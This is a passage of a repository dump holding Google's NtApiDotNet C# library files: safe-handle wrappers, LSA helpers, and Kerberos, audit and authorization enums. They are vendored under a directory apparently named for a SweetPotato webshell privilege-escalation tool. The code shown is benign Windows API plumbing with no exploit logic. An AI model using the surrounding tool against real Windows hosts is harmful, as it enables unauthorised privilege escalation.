8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.SafeHandles
19 | {
20 | internal sealed class SafeCoTaskMemHandle : SafeHandle
21 | {
22 | protected override bool ReleaseHandle()
23 | {
24 | Marshal.FreeCoTaskMem(handle);
25 | return true;
26 | }
27 |
28 | public SafeCoTaskMemHandle(IntPtr handle, bool owns_handle) : base(IntPtr.Zero, owns_handle)
29 | {
30 | SetHandle(handle);
31 | }
32 |
33 | public SafeCoTaskMemHandle()
34 | : base(IntPtr.Zero, true)
35 | {
36 | }
37 |
38 | public override bool IsInvalid
39 | {
40 | get
41 | {
42 | return handle == IntPtr.Zero;
43 | }
44 | }
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLocalAllocBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.SafeHandles
19 | {
20 | internal sealed class SafeLocalAllocBuffer : SafeBuffer
21 | {
22 | protected override bool ReleaseHandle()
23 | {
24 | return Win32NativeMethods.LocalFree(handle) == IntPtr.Zero;
25 | }
26 |
27 | public SafeLocalAllocBuffer(IntPtr handle, bool owns_handle)
28 | : base(owns_handle)
29 | {
30 | SetHandle(handle);
31 | }
32 |
33 | public SafeLocalAllocBuffer() : base(true)
34 | {
35 | }
36 |
37 | public override bool IsInvalid
38 | {
39 | get
40 | {
41 | return handle == IntPtr.Zero;
42 | }
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using NtApiDotNet.Win32.Security.Native;
17 | using NtApiDotNet.Win32.Security.Policy;
18 | using System;
19 |
20 | namespace NtApiDotNet.Win32.SafeHandles
21 | {
22 | internal class SafeLsaHandle : SafeHandleZeroOrMinusOneIsInvalid
23 | {
24 | public SafeLsaHandle(IntPtr handle, bool ownsHandle) : base(ownsHandle)
25 | {
26 | SetHandle(handle);
27 | }
28 |
29 | public SafeLsaHandle() : base(true)
30 | {
31 | }
32 |
33 | protected override bool ReleaseHandle()
34 | {
35 | return SecurityNativeMethods.LsaClose(handle).IsSuccess();
36 | }
37 |
38 | internal static NtResult OpenPolicy(string system_name, LsaPolicyAccessRights desired_access, bool throw_on_error)
39 | {
40 | UnicodeString str = system_name != null ? new UnicodeString(system_name) : null;
41 |
42 | return SecurityNativeMethods.LsaOpenPolicy(str, new ObjectAttributes(),
43 | desired_access, out SafeLsaHandle policy).CreateResult(throw_on_error, () => policy);
44 | }
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaLogonHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using NtApiDotNet.Win32.Security.Native;
17 | using System;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
21 | internal class SafeLsaLogonHandle : SafeHandleZeroOrMinusOneIsInvalid
22 | {
23 | public SafeLsaLogonHandle(IntPtr handle, bool ownsHandle) : base(ownsHandle)
24 | {
25 | SetHandle(handle);
26 | }
27 |
28 | public SafeLsaLogonHandle() : base(true)
29 | {
30 | }
31 |
32 | protected override bool ReleaseHandle()
33 | {
34 | return SecurityNativeMethods.LsaDeregisterLogonProcess(handle).IsSuccess();
35 | }
36 |
37 | internal static NtResult Connect(bool throw_on_error)
38 | {
39 | if (!SecurityNativeMethods.LsaRegisterLogonProcess(new LsaString("NtApiDotNet"), out SafeLsaLogonHandle hlsa, out uint _).IsSuccess())
40 | {
41 | return SecurityNativeMethods.LsaConnectUntrusted(out hlsa).CreateResult(throw_on_error, () => hlsa);
42 | }
43 | return hlsa.CreateResult();
44 | }
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaMemoryBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 |
18 | namespace NtApiDotNet.Win32.SafeHandles
19 | {
20 | internal class SafeLsaMemoryBuffer : SafeBufferGeneric
21 | {
22 | protected override bool ReleaseHandle()
23 | {
24 | return SecurityNativeMethods.LsaFreeMemory(handle).IsSuccess();
25 | }
26 |
27 | public SafeLsaMemoryBuffer()
28 | : base(IntPtr.Zero, 0, true)
29 | {
30 | }
31 |
32 | public override bool IsInvalid
33 | {
34 | get
35 | {
36 | return handle == IntPtr.Zero;
37 | }
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaReturnBufferHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
21 | internal class SafeLsaReturnBufferHandle : SafeBuffer
22 | {
23 | protected override bool ReleaseHandle()
24 | {
25 | SecurityNativeMethods.LsaFreeReturnBuffer(handle);
26 | return true;
27 | }
28 |
29 | public SafeLsaReturnBufferHandle(IntPtr handle, bool owns_handle)
30 | : base(owns_handle)
31 | {
32 | SetHandle(handle);
33 | }
34 |
35 | public SafeLsaReturnBufferHandle()
36 | : base(true)
37 | {
38 | }
39 |
40 | public override bool IsInvalid
41 | {
42 | get
43 | {
44 | return handle == IntPtr.Zero;
45 | }
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeWin32Exception.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.ComponentModel;
17 |
18 | namespace NtApiDotNet.Win32
19 | {
20 | ///
21 | /// Represents an impersonation safe win32 exception, which resolves the win32 message when Message is called.
22 | ///
23 | [Serializable]
24 | public class SafeWin32Exception : Win32Exception
25 | {
26 | ///
27 | /// Constructor.
28 | ///
29 | public SafeWin32Exception()
30 | {
31 | }
32 |
33 | ///
34 | /// Constructor.
35 | ///
36 | /// Win32 error.
37 | public SafeWin32Exception(int error) : base(error)
38 | {
39 | }
40 |
41 | internal SafeWin32Exception(Win32Error error)
42 | : this((int)error)
43 | {
44 | }
45 |
46 | ///
47 | /// The message for the exception.
48 | ///
49 | public override string Message
50 | {
51 | get
52 | {
53 | Win32Exception e = new Win32Exception(NativeErrorCode);
54 | return e.Message;
55 | }
56 | }
57 | }
58 | }
59 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Audit/AuditAccessRights.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Audit
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Access rights for system audit policy.
20 | ///
21 | public enum AuditAccessRights : uint
22 | {
23 | SetSystemPolicy = 0x0001,
24 | QuerySystemPolicy = 0x0002,
25 | SetUserPolicy = 0x0004,
26 | QueryUserPolicy = 0x0008,
27 | EnumerateUsers = 0x0010,
28 | SetMiscPolicy = 0x0020,
29 | QueryMiscPolicy = 0x0040,
30 | All = WriteOwner | WriteDac | ReadControl | Delete | SetSystemPolicy | QuerySystemPolicy |
31 | SetUserPolicy | QueryUserPolicy | EnumerateUsers | SetMiscPolicy | QueryMiscPolicy,
32 | GenericRead = GenericAccessRights.GenericRead,
33 | GenericWrite = GenericAccessRights.GenericWrite,
34 | GenericExecute = GenericAccessRights.GenericExecute,
35 | GenericAll = GenericAccessRights.GenericAll,
36 | Delete = GenericAccessRights.Delete,
37 | ReadControl = GenericAccessRights.ReadControl,
38 | WriteDac = GenericAccessRights.WriteDac,
39 | WriteOwner = GenericAccessRights.WriteOwner,
40 | MaximumAllowed = GenericAccessRights.MaximumAllowed,
41 | AccessSystemSecurity = GenericAccessRights.AccessSystemSecurity,
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Audit/AuditGlobalSaclType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Audit
16 | {
17 | ///
18 | /// Type of global SACL to query or set.
19 | ///
20 | public enum AuditGlobalSaclType
21 | {
22 | ///
23 | /// File type.
24 | ///
25 | File,
26 | ///
27 | /// Key type.
28 | ///
29 | Key
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Audit/AuditPolicyEventType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Audit
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Policy audit event type.
20 | ///
21 | public enum AuditPolicyEventType
22 | {
23 | System = 0,
24 | Logon,
25 | ObjectAccess,
26 | PrivilegeUse,
27 | DetailedTracking,
28 | PolicyChange,
29 | AccountManagement,
30 | DirectoryServiceAccess,
31 | AccountLogon
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/AuthenticationCredentials.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Authentication
18 | {
19 | ///
20 | /// Base class for authentication credentials.
21 | ///
22 | public abstract class AuthenticationCredentials
23 | {
24 | internal abstract SafeBuffer ToBuffer(DisposableList list, string package);
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/AuthenticationImpersonationContext.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 |
18 | namespace NtApiDotNet.Win32.Security.Authentication
19 | {
20 | ///
21 | /// Impersonation context for a server authentication.
22 | ///
23 | public struct AuthenticationImpersonationContext : IDisposable
24 | {
25 | private readonly SecHandle _context;
26 |
27 | internal AuthenticationImpersonationContext(SecHandle context)
28 | {
29 | _context = context;
30 | }
31 |
32 | void IDisposable.Dispose()
33 | {
34 | SecurityNativeMethods.RevertSecurityContext(_context);
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/IAuthenticationContext.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication
16 | {
17 | ///
18 | /// Interface for authentication contexts.
19 | ///
20 | public interface IAuthenticationContext
21 | {
22 | ///
23 | /// The current authentication token.
24 | ///
25 | AuthenticationToken Token { get; }
26 |
27 | ///
28 | /// Whether the authentication is done.
29 | ///
30 | bool Done { get; }
31 |
32 | ///
33 | /// Expiry of the authentication.
34 | ///
35 | long Expiry { get; }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_CHKSUM_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Kerberos Checksum Type.
20 | ///
21 | public enum KRB_CHKSUM_TYPE
22 | {
23 | NONE = 0,
24 | CRC32 = 1,
25 | RSA_MD4 = 2,
26 | RSA_MD4_DES = 3,
27 | DES_MAC = 4,
28 | DES_MAC_K = 5,
29 | RSA_MD4_DES_K = 6,
30 | RSA_MD5 = 7,
31 | RSA_MD5_DES = 8,
32 | RSA_MD5_DES3 = 9,
33 | SHA1_OTHER = 10,
34 | HMAC_SHA1_DES3 = 12,
35 | SHA1 = 14,
36 | HMAC_SHA1_96_AES_128 = 15,
37 | HMAC_SHA1_96_AES_256 = 16,
38 | GSSAPI = 32771,
39 | HMAC_MD5 = -138,
40 | HMAC_MD5_ENC = -1138
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_ENC_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Kerberos Encryption Type.
20 | ///
21 | public enum KRB_ENC_TYPE
22 | {
23 | NULL = 0,
24 | DES_CBC_CRC = 1,
25 | DES_CBC_MD4 = 2,
26 | DES_CBC_MD5 = 3,
27 | DES3_CBC_MD5 = 5,
28 | OLD_DES3_CBC_SHA1 = 7,
29 | SIGN_DSA_GENERATE = 8,
30 | ENCRYPT_RSA_PRIV = 9,
31 | ENCRYPT_RSA_PUB = 10,
32 | DES3_CBC_SHA1 = 16,
33 | AES128_CTS_HMAC_SHA1_96 = 17,
34 | AES256_CTS_HMAC_SHA1_96 = 18,
35 | ARCFOUR_HMAC_MD5 = 23,
36 | ARCFOUR_HMAC_MD5_56 = 24,
37 | ENCTYPE_PK_CROSS = 48,
38 | ARCFOUR_MD4 = -128,
39 | ARCFOUR_HMAC_OLD = -133,
40 | ARCFOUR_HMAC_OLD_EXP = -135,
41 | DES_CBC_NONE = -4096,
42 | DES3_CBC_NONE = -4097,
43 | DES_CFB64_NONE = -4098,
44 | DES_PCBC_NONE = -4099,
45 | DIGEST_MD5_NONE = -4100,
46 | CRAM_MD5_NONE = -4101
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_MSG_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Kerberos Message Type.
20 | ///
21 | public enum KRB_MSG_TYPE
22 | {
23 | KRB_AS_REQ = 10,
24 | KRB_AS_REP = 11,
25 | KRB_TGS_REQ = 12,
26 | KRB_TGS_REP = 13,
27 | KRB_AP_REQ = 14,
28 | KRB_AP_REP = 15,
29 | KRB_TGT_REQ = 16,
30 | KRB_TGT_REP = 17,
31 | KRB_SAFE = 20,
32 | KRB_PRIV = 21,
33 | KRB_CRED = 22,
34 | KRB_ERROR = 30,
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_NAME_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Kerberos Name Type.
20 | ///
21 | public enum KRB_NAME_TYPE
22 | {
23 | UNKNOWN = 0,
24 | PRINCIPAL = 1,
25 | SRV_INST = 2,
26 | SRV_HST = 3,
27 | SRV_XHST = 4,
28 | UID = 5,
29 | X500_PRINCIPAL = 6,
30 | SMTP_NAME = 7,
31 | ENTERPRISE_PRINCIPAL = 10,
32 | ENT_PRINCIPAL_AND_ID = -130,
33 | MS_PRINCIPAL = -128,
34 | MS_PRINCIPAL_AND_ID = -129
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/AuthZAccessCheckResult.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32.Security.Authorization
18 | {
19 | ///
20 | /// Access check result from AuthZ.
21 | ///
22 | public class AuthZAccessCheckResult : AccessCheckResultGeneric
23 | {
24 | ///
25 | /// The Win32 error code from the access check.
26 | ///
27 | public Win32Error Error { get; }
28 |
29 | internal AuthZAccessCheckResult(
30 | NtType type,
31 | Win32Error error,
32 | AccessMask granted_access,
33 | ObjectTypeEntry object_type) : base(error.MapDosErrorToStatus(),
34 | granted_access, type.GenericMapping.UnmapMask(granted_access),
35 | new TokenPrivilege[0], granted_access.ToSpecificAccess(type.AccessRightsType),
36 | type.GenericMapping.UnmapMask(granted_access).ToSpecificAccess(type.AccessRightsType),
37 | object_type?.ObjectType ?? Guid.Empty, object_type?.Name ?? string.Empty, false)
38 | {
39 | Error = error;
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/ProgressInvokeSetting.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authorization
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Progress invoke setting for tree security.
20 | ///
21 | public enum ProgressInvokeSetting
22 | {
23 | InvokeNever = 1,
24 | EveryObject,
25 | OnError,
26 | CancelOperation,
27 | RetryOperation,
28 | PrePostError
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/SeObjectType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authorization
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Enumeration for object type.
20 | ///
21 | public enum SeObjectType
22 | {
23 | Unknown = 0,
24 | File,
25 | Service,
26 | Printer,
27 | RegistryKey,
28 | LMShare,
29 | Kernel,
30 | Window,
31 | Ds,
32 | DsAll,
33 | ProviderDefined,
34 | WmiGuid,
35 | RegistryWow6432Key,
36 | RegistryWow6464Key
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/TreeSecInfo.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authorization
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Tree security mode.
20 | ///
21 | public enum TreeSecInfo
22 | {
23 | Set = 1,
24 | Reset = 2,
25 | ResetKeepExplicit = 3
26 | }
27 |
28 | ///
29 | /// Progress function for tree named security info.
30 | ///
31 | /// The name of the object.
32 | /// The operation status.
33 | /// The current invoke setting.
34 | /// True if security is set.
35 | /// The invoke setting. Return original invoke_setting if no change.
36 | public delegate ProgressInvokeSetting TreeProgressFunction(string object_name, Win32Error status,
37 | ProgressInvokeSetting invoke_setting, bool security_set);
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUDIT_POLICY_INFORMATION.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct AUDIT_POLICY_INFORMATION
22 | {
23 | public Guid AuditSubCategoryGuid;
24 | public int AuditingInformation;
25 | public Guid AuditCategoryGuid;
26 | }
27 | }
